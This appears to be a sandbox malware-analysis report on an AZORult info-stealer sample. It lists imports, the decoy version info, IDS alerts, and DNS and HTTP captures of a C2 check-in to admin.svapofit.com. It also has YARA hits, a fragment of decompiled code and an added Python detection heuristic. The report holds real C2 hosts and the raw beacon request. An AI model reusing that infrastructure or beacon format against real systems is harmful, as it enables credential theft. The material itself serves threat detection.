                           USER32.dll | GetWindow, DialogBoxIndirectParamW, CallNextHookEx, LoadImageW, LoadIconW, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, GetForegroundWindow, GetIconInfo, DrawIconEx, SetRectEmpty, DrawFocusRect, WindowFromPoint, GetMenuDefaultItem, CreatePopupMenu, MessageBeep, GetNextDlgGroupItem, IsRectEmpty, SetRect, InvalidateRgn, CopyAcceleratorTableW, CharNextW, DestroyIcon, DeleteMenu, GetDialogBaseUnits, SystemParametersInfoW, GetMenuItemInfoW, DestroyMenu, RealChildWindowFromPoint, InflateRect, UnregisterClassW, GetSysColorBrush, KillTimer, SetTimer, WaitMessage, MapDialogRect, SetWindowContextHelpId, RegisterClipboardFormatW, ShowOwnedPopups, PostQuitMessage, TranslateMessage, MapVirtualKeyW, GetKeyNameTextW, LoadMenuW, SendDlgItemMessageA, GetActiveWindow, GetNextDlgTabItem, CreateDialogIndirectParamW, IsDialogMessageW, ScrollWindowEx, UnhookWindowsHookEx, SetWindowsHookExW, PtInRect, OffsetRect, FillRect, GetSysColor, GetCursorPos, AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, SetPropW, InvalidateRect, GetUpdateRect, EndPaint, BeginPaint, GetWindowDC, SetForegroundWindow, MessageBoxA, SetActiveWindow, DrawTextW, GetMenu, IsWindowEnabled, SetCapture, IsZoomed, IsWindowVisible, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, CreateWindowExW, GetClassInfoExW, RegisterClassExW, RegisterClassW, CallWindowProcW, GetClassNameW, EnumWindows, MapWindowPoints, IsWindow, SendNotifyMessageW, SendMessageTimeoutW, CharLowerW, DrawIcon, GetSystemMetrics, IsIconic, LoadStringW, RegisterWindowMessageW, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, DrawStateW, DefWindowProcW, GetWindowWord, SetWindowWord, GetClientRect, LoadCursorW, GetLastActivePopup, ShowWindow, PostMessageW, SendMessageW, EnableWindow, DialogBoxParamW, SetDlgItemTextW, EndDialog, GetWindowRect, OemToCharA, GetWindowLongW, SetWindowLongW, GetKeyState, PeekMessageW, DispatchMessageW, SetCursor, GetParent, SendDlgItemMessageW, GetDlgItem, UpdateWindow, MessageBoxW, SetWindowTextW, GetDlgItemTextW, ReleaseDC, CopyImage, ScreenToClient, GetMessageW, wsprintfW, GetClassNameA, wsprintfA, SetFocus, GetDC, ClientToScreen
                           SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHGetFileInfoW, SHGetPathFromIDListW, SHBrowseForFolderW, ShellExecuteExW, SHGetMalloc, ShellExecuteW, SHGetFolderPathW, SHGetSpecialFolderPathW
                           ole32.dll | OleUninitialize, CoCreateInstance, CoTaskMemFree, OleInitialize, CoInitialize
                           ADVAPI32.dll | RegDeleteKeyW, AllocateAndInitializeSid, FreeSid, RegCloseKey, RegCreateKeyExW, RegQueryValueW, RegSetValueW, RegCreateKeyW, RegQueryInfoKeyW, RegOpenKeyW, RegEnumValueW, RegEnumKeyW, RegDeleteValueW, ReportEventA, RegEnumKeyExW, RegSetValueExW, RegQueryValueExW, RegOpenKeyExW, CheckTokenMembership
                           GDI32.dll | SelectClipRgn, SetDIBits, SetDIBitsToDevice, StretchDIBits, SetStretchBltMode, SetBrushOrgEx, SetICMMode, GetColorSpace, GetLogColorSpaceW, SetTextCharacterExtra, SetTextAlign, SetTextJustification, PlayMetaFileRecord, EnumMetaFile, SetWorldTransform, ModifyWorldTransform, SetColorAdjustment, StartDocW, ArcTo, PolyDraw, SelectClipPath, SetArcDirection, ExtCreatePen, MoveToEx, TextOutW, ExtTextOutW, PolyBezierTo, PolylineTo, SetViewportExtEx, SaveDC, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, PatBlt, CombineRgn, GetMapMode, SetRectRgn, DPtoLP, GetBkColor, GetRgnBox, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetDIBits, RealizePalette, CreateDIBitmap, EnumFontFamiliesW, GetTextCharsetInfo, SetPixel, StretchBlt, SetDIBColorTable, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, Rectangle, EnumFontFamiliesExW, OffsetRgn, GetCurrentObject, CreateFontW, GetCharWidthW, RoundRect, FrameRgn, PtInRegion, SetPixelV, ExtFloodFill, SetPaletteEntries, FillRgn, GetBoundsRect, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EndDoc, StartPage, EndPage, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, GetTextFaceW, CloseMetaFile, CreateMetaFileW, DeleteMetaFile, RestoreDC, RectVisible, PtVisible, PlayMetaFile, CreateCompatibleBitmap, SetROP2, SetPolyFillMode, GetLayout, SetLayout, SetMapMode, SetGraphicsMode, SetMapperFlags, SelectPalette, ExtSelectClipRgn, GetTextColor, GdiFlush, SetViewportOrgEx, CreateDCA, GetBitmapBits, GetObjectA, CreateDIBSection, SetTextColor, SetBkMode, GetTextExtentPoint32W, GetStockObject, GetPixel, DeleteDC, CreateSolidBrush, CreateCompatibleDC, BitBlt, AddFontResourceW, SelectObject, DeleteObject, GetObjectW, GetDeviceCaps, GetSystemPaletteEntries, CreateFontIndirectW, OffsetClipRgn, LineTo, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetObjectType, GetCurrentPositionEx, GetClipRgn, GetClipBox, ExcludeClipRect, Escape, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateDIBPatternBrushPt, CreateBitmap, CreateDCW, CopyMetaFileW, GetTextMetricsW, SetBkColor, CreateRoundRectRgn, CreateRectRgn, CreateRectRgnIndirect, CreateBrushIndirect
                           COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                           VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                           KERNEL32.dll | InitializeCriticalSectionAndSpinCount, RtlUnwind, IsDebuggerPresent, InterlockedDecrement, InterlockedIncrement, LockFile, UnlockFile, DuplicateHandle, lstrcmpiW, MoveFileW, GetStringTypeExW, GetFileAttributesExW, GetFileTime, LocalFileTimeToFileTime, SetFileTime, lstrcpyW, SetErrorMode, VerSetConditionMask, VerifyVersionInfoW, GetTempFileNameW, _lclose, _llseek, LoadLibraryW, LoadLibraryExW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetSystemDirectoryW, GetTempPathW, GetWindowsDirectoryW, RemoveDirectoryW, SetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, CopyFileA, CopyFileW, MoveFileExW, GetSystemDefaultLCID, GetUserDefaultLCID, TerminateThread, SetLastError, SetEvent, ResetEvent, GetSystemTimeAsFileTime, CreateEventW, GlobalLock, GlobalUnlock, MultiByteToWideChar, CompareStringW, GetFullPathNameW, GetShortPathNameW, GetExitCodeProcess, GetFileSizeEx, SetHandleInformation, CreatePipe, CreateProcessW, GetDiskFreeSpaceExW, GetCurrentThreadId, GetCurrentThread, GetSystemInfo, WaitForMultipleObjects, GetTickCount, WritePrivateProfileStringW, GetStringTypeW, SetThreadPriority, ResumeThread, GetSystemTime, GetLocalTime, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetVolumeInformationW, FileTimeToSystemTime, ExitProcess, lstrlenA, GlobalSize, FormatMessageW, OutputDebugStringA, EncodePointer, DecodePointer, GetVersion, GetModuleHandleA, GlobalDeleteAtom, lstrcmpW, LoadLibraryA, GlobalAddAtomW, GlobalFindAtomW, SuspendThread, lstrcmpA, CompareStringA, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, LocalReAlloc, GlobalGetAtomNameW, GetAtomNameW, GetThreadLocale, GlobalFlags, GetLocaleInfoW, GetSystemDefaultUILanguage, SetEnvironmentVariableA, GetFullPathNameA, EnumSystemLocalesW, IsValidLocale, LCMapStringW, GetTimeFormatW, GetDateFormatW, OutputDebugStringW, SetConsoleCtrlHandler, FatalAppExitA, SetCurrentDirectoryW, PeekNamedPipe, GetFileInformationByHandle, WriteConsoleW, SetFilePointerEx, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetStartupInfoW, GetStdHandle, GetFileType, SetStdHandle, VirtualQuery, VirtualAlloc, AreFileApisANSI, IsProcessorFeaturePresent, HeapQueryInformation, HeapSize, GetDriveTypeW, ExitThread, CreateThread, ReadConsoleW, GetProcessHeap, HeapAlloc, GetConsoleMode, GetConsoleCP, FindNextFileA, HeapReAlloc, HeapFree, RaiseException, LocalUnlock, LocalLock, GetDiskFreeSpaceW, GetUserDefaultUILanguage, SearchPathW, GetProfileIntW, _lwrite, _lread, OpenFile, lstrlenW, GetProcAddress, GetExitCodeThread, FindResourceExA, GlobalMemoryStatusEx, SetThreadLocale, GetQueuedCompletionStatus, CreateIoCompletionPort, SetProcessWorkingSetSize, IsBadReadPtr, SetEnvironmentVariableW, lstrcpynA, lstrcpyA, lstrcatW, lstrcmpiA, lstrcpynW, CompareFileTime, HeapCreate, GetStartupInfoA, SetHandleCount, GetCommandLineA, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, VirtualFree, GetLocaleInfoA, GetStringTypeA, GetConsoleOutputCP, WriteConsoleA, CreateFileA, DosDateTimeToFileTime, LCMapStringA, VirtualProtect, SetConsoleMode, ReadConsoleInputA, PeekConsoleInputA, GlobalMemoryStatus, GetVersionExA, FindFirstFileA, HeapDestroy, GetCurrentDirectoryW, FileTimeToLocalFileTime, FlushFileBuffers, LockResource, LoadResource, SizeofResource, FindResourceW, CloseHandle, MulDiv, CreateSemaphoreW, OpenSemaphoreW, GetModuleFileNameW, GetFileAttributesW, GetLastError, Sleep, GetCommandLineW, GetVersionExW, GetSystemDefaultLangID, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, FreeResource, GetFileSize, WriteFile, ReadFile, SetEndOfFile, SetFilePointer, GetModuleHandleW, GetPrivateProfileIntW, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, CreateDirectoryW, CreateFileW, WideCharToMultiByte, FindResourceExW, LocalAlloc, LocalFree, FreeLibrary, GlobalAlloc, GlobalFree, OpenProcess, GetCurrentProcess, GetCurrentProcessId, TerminateProcess, WaitForSingleObject, FindClose

                          Version Infos

                           Description | Data
                           LegalCopyright | Blood Accepting Center Donate
                           FileVersion | 6.4.0.0
                           CompanyName | Blood Accepting Center Donate
                           Comments | Blood Accepting Center Donate
                           ProductName | Blood Accepting Center Donate
                           ProductVersion | 6.4.0.0
                           FileDescription | Blood Accepting Center Donate
                           Translation | 0x0000 0x04b0

                          Network Behavior

                          Snort IDS Alerts

                           Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                           09/28/21-00:51:21.739100 | TCP | 2029465 | ET TROJAN Win32/AZORult V3.2 Client Checkin M1 | 49862 | 80 | 192.168.2.3 | 63.141.242.43

                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 28, 2021 00:51:21.565736055 CEST | 192.168.2.3 | 8.8.8.8 | 0xfa02 | Standard query (0) | admin.svapofit.com | A (IP address) | IN (0x0001)
Sep 28, 2021 00:51:21.925509930 CEST | 192.168.2.3 | 8.8.8.8 | 0x442 | Standard query (0) | survey-smiles.com | A (IP address) | IN (0x0001)
Sep 28, 2021 00:51:22.043229103 CEST | 192.168.2.3 | 8.8.8.8 | 0x1066 | Standard query (0) | ww1.survey-smiles.com | A (IP address) | IN (0x0001)

                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 28, 2021 00:51:21.585149050 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa02 | No error (0) | admin.svapofit.com | - | 63.141.242.43 | A (IP address) | IN (0x0001)
Sep 28, 2021 00:51:21.944746017 CEST | 8.8.8.8 | 192.168.2.3 | 0x442 | No error (0) | survey-smiles.com | - | 5.79.68.108 | A (IP address) | IN (0x0001)
Sep 28, 2021 00:51:22.062781096 CEST | 8.8.8.8 | 192.168.2.3 | 0x1066 | No error (0) | ww1.survey-smiles.com | 12065.BODIS.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 28, 2021 00:51:22.062781096 CEST | 8.8.8.8 | 192.168.2.3 | 0x1066 | No error (0) | 12065.BODIS.com | - | 199.59.242.153 | A (IP address) | IN (0x0001)

                          HTTP Request Dependency Graph

                          • admin.svapofit.com
                          • survey-smiles.com
                          • ww1.survey-smiles.com

                          HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49862 | 63.141.242.43 | 80 | C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 00:51:21.739099979 CEST | 5919 | OUT | POST /azs/index.php HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                          Host: admin.svapofit.com
                          Content-Length: 101
                          Cache-Control: no-cache
                          Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d
                          Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>=
Sep 28, 2021 00:51:21.887695074 CEST | 5919 | IN | HTTP/1.1 302 Found
                          cache-control: max-age=0, private, must-revalidate
                          connection: close
                          content-length: 11
                          date: Mon, 27 Sep 2021 22:51:21 GMT
                          location: http://survey-smiles.com
                          server: nginx
                          set-cookie: sid=6f600628-1fe5-11ec-b80c-ddc39747a61b; path=/; domain=.svapofit.com; expires=Sun, 16 Oct 2089 02:05:28 GMT; max-age=2147483647; HttpOnly
                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                          Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49863 | 5.79.68.108 | 80 | C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 00:51:21.973798990 CEST | 5920 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                          Cache-Control: no-cache
                          Host: survey-smiles.com
                          Connection: Keep-Alive
Sep 28, 2021 00:51:22.030646086 CEST | 5920 | IN | HTTP/1.1 302 Found
                          cache-control: max-age=0, private, must-revalidate
                          connection: close
                          content-length: 11
                          date: Mon, 27 Sep 2021 22:51:21 GMT
                          location: http://ww1.survey-smiles.com
                          server: nginx
                          set-cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176; path=/; domain=.survey-smiles.com; expires=Sun, 16 Oct 2089 02:05:29 GMT; max-age=2147483647; HttpOnly
                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                          Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49864 | 199.59.242.153 | 80 | C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 00:51:22.166258097 CEST | 5921 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Host: ww1.survey-smiles.com
                          Cookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176
Sep 28, 2021 00:51:22.269495964 CEST | 5923 | IN | HTTP/1.1 200 OK
                          Server: openresty
                          Date: Mon, 27 Sep 2021 22:51:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: parking_session=61c87920-28c6-e4e4-9f03-a9e204fef8f0; expires=Mon, 27-Sep-2021 23:06:22 GMT; Max-Age=900; path=/; HttpOnly
                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_eNF+XNh9GvjZqNm1u+MIZixMaMS0o4XDi5dH/YZma3b0y3KrdCRlULNNeeHOHQxvscZOqg9dOcBGbSbu4ivBKw==
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Cache-Control: no-store, must-revalidate
                          Cache-Control: post-check=0, pre-check=0
                          Pragma: no-cache
                          Data Raw: 35 35 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 4e 46 2b 58 4e 68 39 47 76 6a 5a 71 4e 6d 31 75 2b 4d 49 5a 69 78 4d 61 4d 53 30 6f 34 58 44 69 35 64 48 2f 59 5a 6d 61 33 62 30 79 33 4b 72 64 43 52 6c 55 4c 4e 4e 65 65 48 4f 48 51 78 76 73 63 5a 4f 71 67 39 64 4f 63 42 47 62 53 62 75 34 69 76 42 4b 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20
                          Data Ascii: 559<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_eNF+XNh9GvjZqNm1u+MIZixMaMS0o4XDi5dH/YZma3b0y3KrdCRlULNNeeHOHQxvscZOqg9dOcBGbSbu4ivBKw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com"
Sep 28, 2021 00:51:22.269531965 CEST | 5924 | IN | Data Raw: 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e
                          Data Ascii: crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNjFjODc5MjAtMjhjNi1lNGU0LTlmMDMtYTllMjA0ZmVmOGYwIiwicGFnZV90aW1lIjoxNjMyNzgzMDgyLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3MS5zdXJ2ZXktc21pbGVzLmNvbVwvI
Sep 28, 2021 00:51:22.269548893 CEST | 5924 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0
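
Reading the three sessions together: the sample's only outbound beacon is the POST to http://admin.svapofit.com/azs/index.php (the C2 URL from the extracted configuration) with a 101-byte body that is not text, no Content-Type, and the legacy "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)" user agent. The server answers with a 302 to survey-smiles.com, and the sample follows it (carrying the sid cookie it was just handed) until it lands on a Bodis parking page (CNAME 12065.BODIS.com, "parking_session" cookie, parking.bodiscdn.com in the HTML). The check-in therefore never reached a live panel during this run; the value of the capture is the request shape, which is what a detection would key on.

The following is an added example, not part of the sandbox report or of the malware: a small Python triage check that parses an HTTP request/response head, scores the request on the traits seen above, and flags a reply that redirects the beacon off-host. The request and 302 response are transcribed from session 0 (the Set-Cookie line is abridged); the benign form post is a constructed control. Thresholds and hit labels are this example's own choices, not a published signature.

```python
"""Heuristic triage of an AZORult-style C2 check-in (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# --- constructed samples: request/response transcribed from this report ---
SAMPLE_REQUEST_HEAD = (
    "POST /azs/index.php HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
    "Host: admin.svapofit.com\r\n"
    "Content-Length: 101\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
# The 101 raw body bytes exactly as the sandbox printed them (10 per line).
SAMPLE_REQUEST_BODY = bytes.fromhex(
    "4a4fed3e32ed3e3c8928"
    "39fe492ffb382ffa494c"
    "ed3e33ed3e3eed3e3bed"
    "3e3eed3e33ed3e3aed3e"
    "3ded3f4e892839fd2839"
    "ff4e4e8d2839ff2839f1"
    "28388c4b4ced3e3ded3e"
    "33ed3e3ded3e3aed3e3d"
    "8d28388c2839fa2839fc"
    "4e4b892839fd4f49ed3e"
    "3d"
)
SAMPLE_RESPONSE_HEAD = (
    "HTTP/1.1 302 Found\r\n"
    "cache-control: max-age=0, private, must-revalidate\r\n"
    "connection: close\r\n"
    "content-length: 11\r\n"
    "date: Mon, 27 Sep 2021 22:51:21 GMT\r\n"
    "location: http://survey-smiles.com\r\n"
    "server: nginx\r\n"
    "set-cookie: sid=6f600628-1fe5-11ec-b80c-ddc39747a61b; path=/; domain=.svapofit.com; HttpOnly\r\n"
    "\r\n"
)
# Constructed benign control: an ordinary browser form post.
BENIGN_REQUEST_HEAD = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/92.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 23\r\n"
    "\r\n"
)
BENIGN_REQUEST_BODY = b"user=alice&password=pw1"

PRINTABLE = frozenset(range(0x20, 0x7F))


def parse_head(raw: str) -> Tuple[str, Dict[str, str]]:
    """Return the start line and a lowercase-keyed header dict of an HTTP head."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def non_printable_bytes(body: bytes) -> int:
    """Count bytes outside 0x20..0x7e; a form post has none, this beacon has many."""
    return sum(1 for b in body if b not in PRINTABLE)


@dataclass
class Verdict:
    hits: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.hits)


def check_request(head: str, body: bytes) -> Verdict:
    """Score a request against the traits the captured check-in shows."""
    v = Verdict()
    start, h = parse_head(head)
    method, path, _ = start.split(" ", 2)
    if method == "POST" and path.lower().endswith("index.php"):
        v.hits.append("POST to index.php")
    ua = h.get("user-agent", "")
    if "MSIE 6.0b" in ua and "Windows NT 5.1" in ua:
        v.hits.append("IE 6.0b / Windows XP user agent")
    if body and "content-type" not in h:
        v.hits.append("POST body with no Content-Type")
    if body:
        n = non_printable_bytes(body)
        if n / len(body) > 0.2:  # threshold is this example's choice
            v.hits.append(f"binary body ({n}/{len(body)} non-printable)")
    declared = h.get("content-length")
    if declared is not None and declared.isdigit() and int(declared) != len(body):
        v.hits.append("Content-Length does not match body")
    return v


def check_response(head: str, request_host: str) -> Verdict:
    """Flag a reply that hands the beacon to another host instead of answering
    it in place, as the captured 302 to survey-smiles.com does."""
    v = Verdict()
    start, h = parse_head(head)
    code = start.split(" ", 2)[1]
    m = re.match(r"https?://([^/:]+)", h.get("location", ""))
    if code.startswith("3") and m and m.group(1).lower() != request_host.lower():
        v.hits.append(f"{code} redirect off-host to {m.group(1)}")
    return v


if __name__ == "__main__":
    for label, head, body in (
        ("sandbox capture", SAMPLE_REQUEST_HEAD, SAMPLE_REQUEST_BODY),
        ("benign form post", BENIGN_REQUEST_HEAD, BENIGN_REQUEST_BODY),
    ):
        v = check_request(head, body)
        print(f"{label}: score {v.score} {v.hits}")
    print(check_response(SAMPLE_RESPONSE_HEAD, "admin.svapofit.com").hits)
```

The request-side checks are deliberately independent of the hostname, since the C2 domain is the first thing that changes between builds; the body check only tests that the 101 bytes are not text, and does not try to decode them. The response check is a triage aid for telling a parked or sinkholed C2 from a live one, not a detection on its own.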


                          Code Manipulations

                          Statistics

                          CPU Usage


                          Memory Usage


                          High Level Behavior Distribution


                          System Behavior

                          General

Start time: 00:49:18
Start date: 28/09/2021
Path: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe'
Imagebase: 0x400000
File size: 208384 bytes
MD5 hash: 73BD76F0549CC1992D943DDFD92A9C4D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, Author: kevoreilly
                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, Author: kevoreilly
Reputation: low

                          Disassembly

                          Code Analysis


                            Executed Functions

                            C-Code - Quality: 64%
                            			E004186C4(char __eax, void* __ebx, void* __edi, signed int __esi, void* __fp0) {
                            				char _v8;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				void* _v60;
                            				char _v64;
                            				char _v68;
                            				signed int _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v85;
                            				char _v86;
                            				char _v87;
                            				char _v92;
                            				char* _v96;
                            				char _v100;
